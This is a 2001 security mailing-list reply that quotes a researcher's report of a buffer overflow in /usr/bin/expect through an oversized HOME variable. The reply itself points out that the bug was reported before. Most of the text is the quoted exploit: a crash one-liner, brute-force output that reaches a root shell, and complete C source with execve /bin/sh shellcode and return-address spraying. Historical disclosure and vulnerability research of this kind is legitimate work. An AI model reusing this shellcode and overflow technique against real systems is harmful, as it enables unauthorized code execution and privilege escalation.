Vulnerability Development: Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]

["Kevin J. Menard, Jr." <kmenard () WPI EDU>]

Hey KF,

    This is pretty much the same thing George Guninski reported to BugTraq.  You
    should give people proper credit where due.

-- 
 Kevin

Tuesday, June 05, 2001, 5:04:23 AM, you wrote:


K> I have found an overflow in and coded the exploit code for several
K> versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
K> unable to think of a situation where this would be useful due to the
K> fact that expect is not suid...can anyone help me determine if this is
K> exploitable to obtain root? Perhaps a suid expect script could be
K> exploited? or maybe something like suid kppp which calls expect as a
K> helper program?

K> [root () linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
K> [root () linux elguapo]# expect
K> Segmentation fault (core dumped)

K> -Kevin Finisterre
K> dotslash () snosoft com
K> --------------54785D81E19EEAA4D65A5A40
K> Content-Transfer-Encoding: 7bit
K> Content-Type: text/plain; charset=us-ascii;
K>  name="expect.c"
K> Content-Disposition: inline;
K>  filename="expect.c"

K> //krfinisterre () checkfree com or dotslash () snosoft com
K> //this is output from my brute script...
K> //722
K> //Stack pointer: 0xbffffa18
K> //       Offset: 0x2d3
K> //  Return addr: 0xbffff745
K> //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
K> $3
K> $L
K> //723
K> //Stack pointer: 0xbffffa18
K> //       Offset: 0x2d4
K> //  Return addr: 0xbffff744
K> //sh-2.04#
K> //note that I was root when I ran this ... expect is not suid

K> #define BUFFERSIZE 533

K> unsigned long sp(void)
K> {
K>         __asm__("movl %esp, %eax");
K> }

K> int main(int argc,char **argv)
K> {
K>   char hell[] =
K>         "\x29\xc0"
K>         "\x29\xc0"
K>         "\xb0\x47"
K>         "\x29\xdb"
K>         "\xb3\x0c"
K>         "\x89\xd9"
K>         "\xcd\x80"
K>         "\x5e"
K>         "\x29\xc0"
K>         "\x88\x46\x07"
K>         "\x89\x46\x0c"
K>         "\x89\x76\x08"
K>         "\xb0\x0b"
K>         "\x87\xf3"
K>         "\x8d\x4b\x08"
K>         "\x8d\x53\x0c"
K>         "\xcd\x80"
K>         "\xe8\xe3\xff\xff\xff"
K>         "\x2f\x62\x69\x6e\x2f\x73\x68";
K>         int i;
K>         int offset;
K>         long esp;
K>         long ret;
K>         long *addr_ptr;
K>         char *buffer, *ptr;
K>         offset = atoi(argv[1]);
K>         esp = sp();
K>         ret = esp-offset;

K>         if(!(buffer = malloc(BUFFERSIZE)))
K>         {
K>                 printf("oops\n");
K>                 exit(-1);
K>         }

K>         ptr = buffer;
K>         addr_ptr = (long *)ptr;
K>         for (i=0; i<BUFFERSIZE; i+=4)
K>                 *(addr_ptr++) = ret;

K>         for (i=0; i<BUFFERSIZE/2; i++)
K>                 buffer[i] = '\xeb02';

K>         ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
K>         for(i=0; i<strlen(hell); i++)
K>                 *(ptr++) = hell[i];

K>         buffer[BUFFERSIZE-1] = 0;

K>         setenv("HOME", buffer, 1);
K>         execlp("/usr/bin/expect", 0);
K> }

K> --------------54785D81E19EEAA4D65A5A40--